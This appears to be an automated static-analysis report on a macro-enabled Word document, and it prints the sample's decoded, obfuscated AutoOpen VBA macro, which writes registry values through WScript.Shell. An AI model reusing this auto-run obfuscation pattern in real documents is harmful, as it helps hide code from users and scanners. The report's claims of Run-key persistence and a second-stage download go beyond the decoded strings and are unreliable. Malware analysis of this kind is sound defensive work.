Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c4f629ae1baee8af…

MALICIOUS

Office (OOXML)

15.9 KB Created: 2021-05-19 18:01:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-05-23
MD5: ceede7b106020a00575bab46a47739b3 SHA-1: ddfb653c378d413aa87385e2f175f63f6d4e6968 SHA-256: c4f629ae1baee8afad19ad3fc1a4560dd1bccd5feb589417bfef4080331109b6
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains an obfuscated VBA macro with an AutoOpen subroutine, a common technique for malicious documents. The macro uses CreateObject to instantiate a scripting shell and attempts to write values to registry Run keys, indicating an attempt to establish persistence and likely download a second-stage payload. The ClamAV detection 'Doc.Malware.Valyria-6923224-0' further supports its malicious nature.

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-6923224-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6923224-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1582 bytes
SHA-256: f99d4d776295d70c0bcab4e9f62f5c687d9f9bc0c4195210b66b8ac4d7163fab
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim faxiudxf As String
Dim ijmdlzxykuey As Variant
Dim gaofeykyhwijb As Variant
Dim ppudwdgweq As Integer
Dim wimfpfbolsxlruhhm As String
Dim ghgipaqrieqvnkplfv As Object
On Error Resume Next
Set ghgipaqrieqvnkplfv = CreateObject(argxwonwyipe("57") & argxwonwyipe("5363726970742e5368656c6c"))
xRegMainKey = argxwonwyipe("484b4559") & argxwonwyipe("5f43555252454e545f555345525c536f6674776172655c")
xRegKey = Array(argxwonwyipe("4b65794f") & argxwonwyipe("6e65"), argxwonwyipe("4b") & argxwonwyipe("657954776f"), argxwonwyipe("4b") & argxwonwyipe("65795468726565"), argxwonwyipe("4b6579466f") & argxwonwyipe("7572"))
xRegValue = Array(argxwonwyipe("7878"), argxwonwyipe("7979"), argxwonwyipe("56616c756554") & argxwonwyipe("68726565"), argxwonwyipe("56616c7565466f75") & argxwonwyipe("72"))
For ppudwdgweq = 0 To UBound(ijmdlzxykuey)
ghgipaqrieqvnkplfv.RegWrite faxiudxf + ijmdlzxykuey(ppudwdgweq), gaofeykyhwijb(ppudwdgweq)
Next
MsgBox argxwonwyipe("57") & argxwonwyipe("72697465206f6b21")
End Sub
Private Function argxwonwyipe(ByVal amuqacsajpbq As String) As String
Dim xxbsexbjkmtm As Long
For xxbsexbjkmtm = 1 To Len(amuqacsajpbq) Step 2
argxwonwyipe = argxwonwyipe & Chr$(Val("&H" & Mid$(amuqacsajpbq, xxbsexbjkmtm, 2)))
Next xxbsexbjkmtm
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9728 bytes
SHA-256: 69f1e3d6d7c31165a64c49a8698a84960a86e7ac4373bfde61dedf827728d037
Detection
ClamAV: Doc.Malware.Valyria-6923224-0
Obfuscation or payload: unlikely